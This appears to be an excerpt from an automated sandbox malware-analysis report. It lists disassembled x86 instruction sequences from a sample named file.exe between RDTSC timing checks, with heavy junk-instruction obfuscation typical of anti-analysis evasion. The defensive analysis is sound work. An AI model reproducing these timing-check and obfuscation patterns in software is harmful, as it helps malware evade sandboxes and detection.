                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C701F3 second address: 4C7028A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2E050A57D5h 0x00000013 jmp 00007F2E050A57CBh 0x00000018 popfd 0x00000019 call 00007F2E050A57D8h 0x0000001e pop eax 0x0000001f popad 0x00000020 pushfd 0x00000021 jmp 00007F2E050A57CBh 0x00000026 sbb ch, 0000002Eh 0x00000029 jmp 00007F2E050A57D9h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F2E050A57CCh 0x00000038 or ax, DBA8h 0x0000003d jmp 00007F2E050A57CBh 0x00000042 popfd 0x00000043 push eax 0x00000044 push edx 0x00000045 push ecx 0x00000046 pop ebx 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7028A second address: 4C7028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7028E second address: 4C70303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 call 00007F2E050A57D7h 0x0000000e mov eax, 785E0C7Fh 0x00000013 pop esi 0x00000014 pushfd 0x00000015 jmp 00007F2E050A57D5h 0x0000001a sub esi, 6432C126h 0x00000020 jmp 00007F2E050A57D1h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushfd 0x0000002c jmp 00007F2E050A57CAh 0x00000031 or cx, 42C8h 0x00000036 jmp 00007F2E050A57CBh 0x0000003b popfd 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70303 second address: 4C70334 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 2EB3D03Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, 181F315Bh 0x0000000e popad 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F2E044F25FAh 0x0000001b or cx, C528h 0x00000020 jmp 00007F2E044F25FBh 0x00000025 popfd 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70334 second address: 4C7033E instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7033E second address: 4C703C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007F2E044F25FAh 0x0000000c mov dword ptr [esp], edi 0x0000000f jmp 00007F2E044F2600h 0x00000014 test esi, esi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F2E044F25FEh 0x0000001d adc al, FFFFFFE8h 0x00000020 jmp 00007F2E044F25FBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F2E044F2608h 0x0000002c adc ch, 00000048h 0x0000002f jmp 00007F2E044F25FBh 0x00000034 popfd 0x00000035 popad 0x00000036 je 00007F2E767B085Fh 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F2E044F2605h 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C703C9 second address: 4C70412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 pushad 0x00000012 movzx ecx, bx 0x00000015 mov bl, C0h 0x00000017 popad 0x00000018 mov ch, E2h 0x0000001a popad 0x0000001b je 00007F2E77363A01h 0x00000021 jmp 00007F2E050A57D3h 0x00000026 mov edx, dword ptr [esi+44h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70412 second address: 4C70416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70416 second address: 4C7041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7041C second address: 4C70496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 pushfd 0x00000012 jmp 00007F2E044F2606h 0x00000017 add si, 00F8h 0x0000001c jmp 00007F2E044F25FBh 0x00000021 popfd 0x00000022 popad 0x00000023 test edx, 61000000h 0x00000029 jmp 00007F2E044F2606h 0x0000002e jne 00007F2E767B0807h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F2E044F2607h 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70496 second address: 4C7049C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6080D second address: 4C60876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2E044F2607h 0x00000009 sbb si, 516Eh 0x0000000e jmp 00007F2E044F2609h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov di, ax 0x0000001c call 00007F2E044F2604h 0x00000021 mov ah, 72h 0x00000023 pop ebx 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 mov esi, 4F34DC65h 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60876 second address: 4C6087A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6087A second address: 4C60897 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60897 second address: 4C6089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6089D second address: 4C608B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop edi 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C608B0 second address: 4C60915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov cx, 9F4Dh 0x00000011 pushfd 0x00000012 jmp 00007F2E050A57CAh 0x00000017 add ch, 00000068h 0x0000001a jmp 00007F2E050A57CBh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F2E050A57D2h 0x0000002b and cx, 50C8h 0x00000030 jmp 00007F2E050A57CBh 0x00000035 popfd 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60A84 second address: 4C60A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60A88 second address: 4C60A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60A8E second address: 4C60B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 push ebx 0x00000011 mov bx, cx 0x00000014 pop esi 0x00000015 popad 0x00000016 mov ebx, 00000000h 0x0000001b jmp 00007F2E044F25FEh 0x00000020 test esi, esi 0x00000022 jmp 00007F2E044F2600h 0x00000027 je 00007F2E767B7EB2h 0x0000002d jmp 00007F2E044F2600h 0x00000032 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000039 pushad 0x0000003a jmp 00007F2E044F25FEh 0x0000003f mov cx, 8AC1h 0x00000043 popad 0x00000044 mov ecx, esi 0x00000046 jmp 00007F2E044F25FCh 0x0000004b je 00007F2E767B7E88h 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F2E044F2607h 0x00000058 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60B30 second address: 4C60B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60B36 second address: 4C60B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60B3A second address: 4C60B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60B3E second address: 4C60BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f jmp 00007F2E044F2607h 0x00000014 jne 00007F2E767B7E48h 0x0000001a jmp 00007F2E044F2606h 0x0000001f mov edx, dword ptr [ebp+0Ch] 0x00000022 jmp 00007F2E044F2600h 0x00000027 xchg eax, ebx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F2E044F25FEh 0x0000002f sbb ecx, 533F7928h 0x00000035 jmp 00007F2E044F25FBh 0x0000003a popfd 0x0000003b popad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F2E044F25FEh 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60BCA second address: 4C60BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60BD0 second address: 4C60BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, D4A3h 0x00000007 mov di, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60BE4 second address: 4C60BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60BE8 second address: 4C60BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60BEE second address: 4C60C63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2E050A57D4h 0x00000009 sub ecx, 0D0D4118h 0x0000000f jmp 00007F2E050A57CBh 0x00000014 popfd 0x00000015 mov cx, A0CFh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d jmp 00007F2E050A57D2h 0x00000022 push eax 0x00000023 jmp 00007F2E050A57CBh 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a jmp 00007F2E050A57D4h 0x0000002f movzx esi, di 0x00000032 popad 0x00000033 push dword ptr [ebp+14h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov dl, ah 0x0000003b push edi 0x0000003c pop eax 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60CD3 second address: 4C60D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov esp, ebp 0x00000008 pushad 0x00000009 mov bx, ax 0x0000000c popad 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F2E044F25FFh 0x00000017 jmp 00007F2E044F2603h 0x0000001c popfd 0x0000001d call 00007F2E044F2608h 0x00000022 pop esi 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D44 second address: 4C70D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D48 second address: 4C70D4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D4E second address: 4C70D6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D6E second address: 4C70D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D73 second address: 4C70D96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, 98h 0x0000000f mov bx, 3ABCh 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D96 second address: 4C70DBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov eax, 17913C43h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2E044F2605h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70B43 second address: 4C70B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70B4A second address: 4C70B68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F2E044F25FEh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70B68 second address: 4C70B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70B6C second address: 4C70B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70B70 second address: 4C70B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70B76 second address: 4C70B93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2604h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70B93 second address: 4C70BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 3E357BB9h 0x00000009 popad 0x0000000a mov bx, si 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 call 00007F2E050A57CEh 0x00000016 pushfd 0x00000017 jmp 00007F2E050A57D2h 0x0000001c jmp 00007F2E050A57D5h 0x00000021 popfd 0x00000022 pop ecx 0x00000023 mov edx, 6F0820D4h 0x00000028 popad 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F2E050A57D6h 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF06F0 second address: 4CF0707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F2603h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0707 second address: 4CF070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF070B second address: 4CF071A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF071A second address: 4CF071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF071E second address: 4CF0722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0722 second address: 4CF0728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0728 second address: 4CF072E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF072E second address: 4CF0732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0732 second address: 4CF0744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ebx, 6AA274EEh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE09A3 second address: 4CE09A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE09A7 second address: 4CE09AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE084C second address: 4CE0851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0851 second address: 4CE086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F2607h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C800F6 second address: 4C8011C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8011C second address: 4C80137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007F2E044F25FCh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80137 second address: 4C8019B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2E050A57CAh 0x00000008 sbb cx, FD48h 0x0000000d jmp 00007F2E050A57CBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F2E050A57D8h 0x0000001b or si, BFA8h 0x00000020 jmp 00007F2E050A57CBh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F2E050A57D5h 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8019B second address: 4C801AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F25FCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C801AB second address: 4C801AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C801AF second address: 4C801F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F2E044F25FDh 0x00000010 and esi, 772D4526h 0x00000016 jmp 00007F2E044F2601h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007F2E044F25FEh 0x00000023 pop ecx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0B10 second address: 4CE0B1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0B1F second address: 4CE0BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007F2E044F25FBh 0x0000000b and al, 0000002Eh 0x0000000e jmp 00007F2E044F2609h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov ecx, 4AD76553h 0x0000001e mov dx, cx 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F2E044F2605h 0x00000028 xchg eax, ebp 0x00000029 jmp 00007F2E044F25FEh 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 call 00007F2E044F25FEh 0x00000036 mov eax, 3448B111h 0x0000003b pop eax 0x0000003c pushfd 0x0000003d jmp 00007F2E044F2607h 0x00000042 sbb eax, 275742FEh 0x00000048 jmp 00007F2E044F2609h 0x0000004d popfd 0x0000004e popad 0x0000004f push dword ptr [ebp+0Ch] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F2E044F2608h 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0BEF second address: 4CE0BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0BFE second address: 4CE0C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0C04 second address: 4CE0C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0C08 second address: 4CE0C3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b jmp 00007F2E044F2607h 0x00000010 call 00007F2E044F25F9h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a mov dh, F6h 0x0000001c popad 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0C3B second address: 4CE0CBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2E050A57D9h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F2E050A57D1h 0x0000000f and eax, 227FC406h 0x00000015 jmp 00007F2E050A57D1h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f pushad 0x00000020 movsx ebx, cx 0x00000023 pushad 0x00000024 jmp 00007F2E050A57D6h 0x00000029 mov ch, DDh 0x0000002b popad 0x0000002c popad 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 jmp 00007F2E050A57CCh 0x00000036 mov eax, dword ptr [eax] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0CBC second address: 4CE0CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F2E044F25FAh 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE0D36 second address: 4CE0D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102465 second address: 1102469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102699 second address: 110269D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
